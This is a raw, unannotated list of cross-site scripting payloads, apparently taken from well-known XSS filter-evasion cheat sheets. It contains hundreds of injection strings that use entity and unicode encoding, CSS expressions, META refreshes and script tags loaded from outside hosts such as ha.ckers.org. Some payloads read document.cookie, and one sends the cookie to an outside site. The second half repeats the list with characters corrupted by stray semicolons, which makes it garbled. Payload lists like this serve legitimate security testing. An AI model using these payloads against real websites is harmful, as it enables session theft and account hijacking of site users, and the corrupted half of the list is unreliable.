            &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
            &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
            <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
            <div/style="width:expression(confirm(1))">X</div> {IE7}
            <iframe// src=javaSCRIPT&colon;alert(1)
            //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
            /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
            //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
            </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/

            |\>''alert&#x28;1&#x29; {Opera}
            <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
            <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
            <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
            <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
            <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
            <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
            <var onmouseover="prompt(1)">On Mouse Over</var>
            <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
            <img src="/" =_=" title="onerror='prompt(1)'">
            <%<!--'%><script>alert(1);

            X

            click

            MsgBox+1
            <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
            <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
            <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')
            +-+-1-+-+alert(1)

            /*<script* */alert(1)//&NewLine;confirm(1);
            alert(1)
            <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
            <script x> alert(1) style="x:">
            <--` --!>

            x
            ">
            CLICKME
            click

            Click Me
            '';!--"=&{()}
            '>//\\,<'>">">"*"
            '); alert('XSS
            alert(1);
            alert('XSS');




            alert("XSS")">
            ipt>alert('XSS');ipt>
            alert(String.fromCharCode(88,83,83))

            @im\port'\ja\vasc\ript:alert(\"XSS\")';
            echo('alert(\"XSS\")'); ?>
            alert('XSS')




            ">alert(0)

            alert(/xss/)
            alert(/xss/)


            alert('XSS')

            >
            window.alert("Bonjour !");


            onload=alert('XSS')>
            ">
            '>><marquee><h1>XSS</h1></marquee>
            '">><script>alert('XSS')
            '">>

            XSS

            var var = 1; alert(var)
            BODY{background:url("javascript:alert('XSS')")}
            ='alert("XSS")'?>

            " onfocus=alert(document.domain) "> <"

            li {list-style-image: url(\"javascript:alert('XSS')\");}

            • XSS
              perl -e 'print \"alert(\"XSS\")\";' > out
              perl -e 'print \"\";' > out


              alert(1)

              alert(1)
              ">
              [color=red width=expression(alert(123))][color]

              Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
              ">alert(123)

              '">alert(1111)
              '">alert(document.cookie)
              '""> alert('X \nS \nS');
              <<<<>>>><<<script>alert(123)
              (123)(123)

              '>alert(123)
              '>">
              }a=eval;b=alert;a(b(/XSS/.source));
              document.write("XSS");
              a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
              ='>alert("xss")
              "+src="http://yoursite.com/xss.js?69,69">
              alert(navigator.userAgent)>
              ">/XaDoS/>alert(document.cookie)
              ">/KinG-InFeT.NeT/>alert(document.cookie)
              src="http://www.site.com/XSS.js">
              data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
              !--" />alert('xss');
              alert("XSS by \nxss")

              XSS by xss


              ">alert("XSS by \nxss")>

              XSS by xss


              '">alert("XSS by \nxss")>

              XSS by xss


              alert("XSS by \nxss")

              XSS by xss


              alert(1337)

              XSS by xss


              ">alert(1337)">alert("XSS by \nxss</h1></marquee>
              '"></title><script>alert(1337)>

              XSS by xss


              XSS by xss


              '>alert(String.fromCharCode(88,83,83))
<br />"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
<br />\alert(String.fromCharCode(88,83,83))\'alert(String.fromCharCode(88,83,83));
              >"><ScRiPt%20%0a%0d>alert(561177485777)%3B

              alert(“XSS”);




              ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
              '';!--"<XSS>=&{()}
              <SCRIPT>alert('XSS')</SCRIPT>
              <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
              <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
              <BASE HREF="javascript:alert('XSS');//">
              <BGSOUND SRC="javascript:alert('XSS');">
              <BODY BACKGROUND="javascript:alert('XSS');">
              <BODY ONLOAD=alert('XSS')>
              <DIV STYLE="background-image: url(javascript:alert('XSS'))">
              <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
              <DIV STYLE="width: expression(alert('XSS'));">
              <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
              <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
              <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
              <IMG SRC="javascript:alert('XSS');">
              <IMG SRC=javascript:alert('XSS')>
              <IMG DYNSRC="javascript:alert('XSS');">
              <IMG LOWSRC="javascript:alert('XSS');">
              <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
              Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
              exp/*<XSS STYLE='no\xss:noxss("*//*");
              <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
              <IMG SRC='vbscript:msgbox("XSS")'>
              <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
              <IMG SRC="livescript:[code]">
              %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
              <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
              <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
              <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
              <IMG SRC="mocha:[code]">
              <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
              <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
              <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
              a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";
              eval(a+b+c+d);
              <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
              <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
              <XSS STYLE="xss:expression(alert('XSS'))">
              <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
              <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
              <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
              <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
              <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
              <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
              <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
              <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
              <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
              <HTML xmlns:xss>
              <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
              <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
              <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
              <HTML><BODY>
              <!--[if gte IE 4]>
              <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
              <XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
              <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
              <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
              <? echo('<SCR)';
              <BR SIZE="&{alert('XSS')}">
              <IMG SRC=JaVaScRiPt:alert('XSS')>
              <IMG SRC=javascript:alert(&quot;XSS&quot;)>
              <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
              <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
              <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
              <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
              <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
              <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
              <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
              \";alert('XSS');//
              </TITLE><SCRIPT>alert("XSS");</SCRIPT>
              <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
              <IMG SRC="jav ascript:alert('XSS');">
              <IMG SRC="jav&#x09;ascript:alert('XSS');">
              <IMG SRC="jav&#x0A;ascript:alert('XSS');">
              <IMG SRC="jav&#x0D;ascript:alert('XSS');">
              <IMG
              SRC
              =
              "
              j
              a
              v
              a
              s
              c
              r
              i
              p
              t
              :
              a
              l
              e
              r
              t
              (
              '
              X
              S
              S
              '
              )
              "
              >
              perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
              perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
              <IMG SRC=" &#14; javascript:alert('XSS');">
              <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
              <SCRIPT SRC=http://ha.ckers.org/xss.js
              <SCRIPT SRC=//ha.ckers.org/.j>
              <IMG SRC="javascript:alert('XSS')"
              <IFRAME SRC=http://ha.ckers.org/scriptlet.html <
              <<SCRIPT>alert("XSS");//<</SCRIPT>
              <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
              <SCRIPT>a=/XSS/
              <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
              <A HREF="http://66.102.7.147/">XSS</A>
              <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
              <A HREF="http://1113982867/">XSS</A>
              <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
              <A HREF="http://0102.0146.0007.00000223/">XSS</A>
              <A HREF="h
              tt p://6&#09;6.000146.0x7.147/">XSS</A>
              <A HREF="//www.google.com/">XSS</A>
              <A HREF="//google">XSS</A>
              <A HREF="http://ha.ckers.org@google">XSS</A>
              <A HREF="http://google:ha.ckers.org">XSS</A>
              <A HREF="http://google.com/">XSS</A>
              <A HREF="http://www.google.com./">XSS</A>
              <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
              <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
              document.vulnerable=true;


              <document.vulnerable=true;//<
              document.vulnerable=true;
              document.vulnerable=true;



              li {list-style-image: url("javascript:document.vulnerable=true;");

              • XSS

                1script3document.vulnerable=true;1/script3




                @im\port'\ja\vasc\ript:document.vulnerable=true';

                exp/*
                document.vulnerable=true;
                .XSS{background-image:url("javascript:document.vulnerable=true");}

                BODY{background:url("javascript:document.vulnerable=true")}

                ]]

                echo('document.vulnerable=true'); ?>

                +ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-



                &document.vulnerable=true;
                &{document.vulnerable=true;};







                document.vulnerable=true;

                <!--document.vulnerable=true;//-->
                <document.vulnerable=true;
                document.vulnerable=true;//-->
                document.vulnerable=true;

                document.vulnerable=true;;


                [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>
                @import'http://www.securitycompass.com/xss.css';

                BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}

                XSS

                " SRC="http://www.securitycompass.com/xss.js">

                '" SRC="http://www.securitycompass.com/xss.js">
                ` SRC="http://www.securitycompass.com/xss.js">

                document.write("<SCRI");PT SRC="http://www.securitycompass.com/xss.js">

                [Mozilla]
                "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
                </script><script>alert(1)</script>
                </br style=a:expression(alert())>
                <scrscriptipt>alert(1)</scrscriptipt>
                <br size=\"&{alert('XSS')}\">
                perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
                perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
                <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
                <~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>
                <~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
                <~/XSS STYLE=xss:expression(alert('XSS'))>
                ">alert('XSS')

                XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
                XSS STYLE=xss:e/**/xpression(alert('XSS'))>

                ';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
                ';';;!--";<;XSS>;=&;{()}
                <;SCRIPT>;alert(';XSS';)<;/SCRIPT>;
                <;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;
                <;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;
                <;BASE HREF=";javascript:alert(';XSS';);//";>;
                <;BGSOUND SRC=";javascript:alert(';XSS';);";>;
                <;BODY BACKGROUND=";javascript:alert(';XSS';);";>;
                <;BODY ONLOAD=alert(';XSS';)>;
                <;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;
                <;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;
                <;DIV STYLE=";width: expression(alert(';XSS';));";>;
                <;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;
                <;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;
                <;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;
                <;IMG SRC=";javascript:alert(';XSS';);";>;
                <;IMG SRC=javascript:alert(';XSS';)>;
                <;IMG DYNSRC=";javascript:alert(';XSS';);";>;
                <;IMG LOWSRC=";javascript:alert(';XSS';);";>;
                <;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;
                Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser
                exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
                <;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS
                <;IMG SRC=';vbscript:msgbox(";XSS";)';>;
                <;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;
                <;IMG SRC=";livescript:[code]";>;
                %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
                <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;
                <;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;
                <;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;
                <;IMG SRC=";mocha:[code]";>;
                <;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
                <;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;
                <;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;
                a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";;
                eval(a+b+c+d);
                <;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;
                <;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;
                <;XSS STYLE=";xss:expression(alert(';XSS';))";>;
                <;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
                <;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;
                <;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;
                <;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;
                <;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;
                <;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;
                <;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;
                <;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;
                <;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;
                <;HTML xmlns:xss>;
                <;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;
                <;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;
                <;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;
                <;HTML>;<;BODY>;
                <;!--[if gte IE 4]>;
                <;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;
                <;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;
                <;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;
                <;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;
                <;? echo(';<;SCR)';;
                <;BR SIZE=";&;{alert(';XSS';)}";>;
                <;IMG SRC=JaVaScRiPt:alert(';XSS';)>;
                <;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;
                <;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;
                <;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;
                <;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;
                <;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;
                <;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;
                <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;
                <;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
                \";;alert(';XSS';);//
                <;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;
                <;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;
                <;IMG SRC=";jav ascript:alert(';XSS';);";>;
                <;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;
                <;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;
                <;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;
                <;IMG
                SRC
                =
                ";
                j
                a
                v
                a
                s
                c
                r
                i
                p
                t
                :
                a
                l
                e
                r
                t

                ';
                X
                S
                S
                ';
                )
                ";
                >;
                perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out
                perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out
                <;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;
                <;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;
                <;SCRIPT SRC=http://ha.ckers.org/xss.js
                <;SCRIPT SRC=//ha.ckers.org/.j>;
                <;IMG SRC=";javascript:alert(';XSS';)";
                <;IFRAME SRC=http://ha.ckers.org/scriptlet.html <;
                <;<;SCRIPT>;alert(";XSS";);//<;<;/SCRIPT>;
                <;IMG ";";";>;<;SCRIPT>;alert(";XSS";)<;/SCRIPT>;";>;
                <;SCRIPT>;a=/XSS/
                <;SCRIPT a=";>;"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;SCRIPT =";blah"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;SCRIPT a=";blah"; ';'; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;SCRIPT ";a=';>;';"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;SCRIPT a=`>;` SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;SCRIPT>;document.write(";<;SCRI";);<;/SCRIPT>;PT SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;SCRIPT a=";>';>"; SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
                <;A HREF=";http://66.102.7.147/";>;XSS<;/A>;
                <;A HREF=";http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
                <;A HREF=";http://1113982867/";>;XSS<;/A>;
                <;A HREF=";http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
                <;A HREF=";http://0102.0146.0007.00000223/";>;XSS<;/A>;
                <;A HREF=";h
                tt p://6&;#09;6.000146.0x7.147/";>;XSS<;/A>;
                <;A HREF=";//www.google.com/";>;XSS<;/A>;
                <;A HREF=";//google";>;XSS<;/A>;
                <;A HREF=";http://ha.ckers.org@google";>;XSS<;/A>;
                <;A HREF=";http://google:ha.ckers.org";>;XSS<;/A>;
                <;A HREF=";http://google.com/";>;XSS<;/A>;
                <;A HREF=";http://www.google.com./";>;XSS<;/A>;
                <;A HREF=";javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
                <;A HREF=";http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
                document.vulnerable=true;


                <document.vulnerable=true;//<
                document.vulnerable=true;
                document.vulnerable=true;



                li {list-style-image: url("javascript:document.vulnerable=true;");

                • XSS

                  1script3document.vulnerable=true;1/script3